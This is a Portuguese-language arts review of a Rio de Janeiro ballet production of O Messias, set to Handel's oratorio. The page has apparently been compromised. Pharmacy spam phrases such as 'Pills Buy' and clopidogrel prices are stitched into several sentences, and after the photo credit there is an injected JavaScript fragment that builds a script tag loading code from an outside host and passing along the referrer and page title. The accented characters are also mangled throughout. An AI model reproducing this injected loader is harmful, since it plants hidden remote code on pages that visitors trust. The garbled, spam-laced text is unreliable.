Balé/DançaCantoCríticaLateralMúsica coralRio de Janeiro

Azul A� a cor mais quente

BalA� O Messias, com trechos do famoso oratA?rio de Haendel, A� a imperdA�vel atraA�A?o natalina no TMRJ.

 

Todos os anos, com a chegada de dezembro e do espA�rito natalino, espera-se ver, no palco do Theatro Municipal do Rio de Janeiro, uma tradicional montagem do balA� O Quebra-Nozes, com sua doA�ura e encantamento. Neste 2015 cheio de tantas emoA�A�es, algo original se apresenta como a atraA�A?o de fim de ano da Casa carioca: entra em cena o balA� O Messias, criaA�A?o do coreA?grafo argentino Mauricio Wainrot com base em 32 temas do oratA?rio homA?nimo de G. F. Haendel. O espetA?culo estreou no dia 17 de dezembro e prossegue atA� 30 do mesmo mA?s.

Composta em menos de um mA?s, em 1741, para as celebraA�A�es da PA?scoa do ano seguinte, Purchase The Messiah, HWV 56, tem 51 movimentos divididos em trA?s partes. AlA�m de seu cA�lebre coro Aleluia Pills Buy Buy Pills , o oratA?rio A� uma das mais brilhantes pA�rolas do perA�odo barroco, com belA�ssimas partes corais e A?rias para soprano, contralto, tenor e baixo.

Arrojo A� uma palavra que bem define oA�espetA?culo em cartaz. Sobre o palco, ao abrir o pano, um cenA?rio clean e muito bonito de Carlos Gallardo (tambA�m responsA?vel pelos figurinos alvos e elegantes), com uma impressionante iluminaA�A?o de Eli Sirlin, carregada de brancos, azuis e violetas. A irrepreensivelA�primeira bailarina Claudia Mota Purchase e componentesA�do BalA� do TMRJ flutuam nos passos criados por Wainrot em 1996. De grande apuro visual, a coreografia exala leveza, com saltos elaborados e ensembles de muito garbo, nos quais se destacam, particularmente, os rapazes (viva Murilo Gabriel, Rodrigo Negri, Paulo Muniz, Edifranc Alves e Arthur Sai, para citar alguns). Entre os pontos altos, o belA�ssimo pas-de-deux de He shall feed his flock, a referA?ncia A� PietA� em Behold and see e o duo etA�reo das bailarinas Priscila Mota e Claudia Mota em plavix 75mg clopidogrel prices How beautiful are the feet.

 

Priscila Mota e Claudia Mota
Priscila Mota e Claudia Mota

 

Para a execuA�A?o musical, estavam no fosso do Theatro Municipal do RJ o maestro Silvio Viegas (em sua A?ltima apresentaA�A?o no Rio de JaneiroA�antes de assumir a regA?ncia da Orquestra SinfA?nica de MG)A�e, na rA�cita de estreia, os cantores Lina Mendes (soprano), Carolina Faria (contralto), AnA�bal Mancini (tenor) e Inacio de Nonno Pills (barA�tono), A� frente de Coro e Orquestra SinfA?nica do TMRJ. Residem aqui os principais senA�es do espetA?culo. Faltou certa cor barroca A� leitura da partitura, aparentemente tratada, de certa forma, como uma composiA�A?o de outro estilo. O equA�voco mais gritante, no entanto, foi o andamento deveras acelerado (exigA?ncia da coreografia?) na obra como um todo, o que prejudicou especialmente o Coro. Formado por vozes operA�sticas e mais pesadas, em sua maioria, falta (e faltou mais ainda com o acelerado andamento) ao grupo (principalmente A�s vozes masculinas) agilidade para os ornamentos da obra. A fuga de He trusted in God, por exemplo, transformou-se em uma caA�ada, com pouca clareza nos ornamentos.

Os solistas conseguiram desvencilhar-se das dificuldades oriundas da rapidez da batuta. O tenor AnA�bal, de voz ligeira e com corpo, comeA�ou Comfort yeA�com poucaA�seguranA�a, mas logo fez bonitos trinados em Ev’ry valley e alcanA�ou seu ponto alto em Behold and see. O barA�tono Inacio, o mais experiente do grupo, lanA�ou mA?o de sua tA�cnica (talvez precisasse apenas homogeneizar as emissA�es da letra “A?” com as demais vogais) e fez bonito em The people that walk in darkness. Carolina, contralto de voz inigualA?vel, esteve impecA?vel em O thou that tellest. A soprano Lina, de notA?velA�vocaA�A?o para o barroco, encantou com criativos ornamentos mesmo em uma Rejoice de estranhA�ssimo andamento marcial.

A mA?sica de Haendel, um dos pontos altos da criaA�A?o humana de todos os tempos, sobressai-se mesmo com escorregA�ezinhos aqui e ali em sua execuA�A?o. Neste programa do Theatro Municipal do RJ, ela acompanha um moderno e inventivo balA�, levado A� cena com inspirados figurino e iluminaA�A?o, e danA�ado com elegA?ncia e profissionalismo pelo corpo de baile da Casa. Que a leveza, a graA�a e a calorosa luz azul deste imperdA�vel espetA?culo natalino permeiem nossos caminhos por todo o ano que vem.

Confira datas e horA?rios de O Messias

Fotos: JA?lia RA?nais.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

Fabiano Gonçalves
Publicitário e roteirista (formado no Maurits Binger Film Institute - Amsterdã). Corroteirista do longa O Amor Está no Ar e de programas de TV (novela Chiquititas - 1998/2000). Redator na revista SuiGeneris, no site Escola24horas e no Departamento Nacional do Senac. Um dos fundadores do movimento.com, escreve também sobre televisão para o site teledossie.com.br. - E-mail: fabiano@movimento.com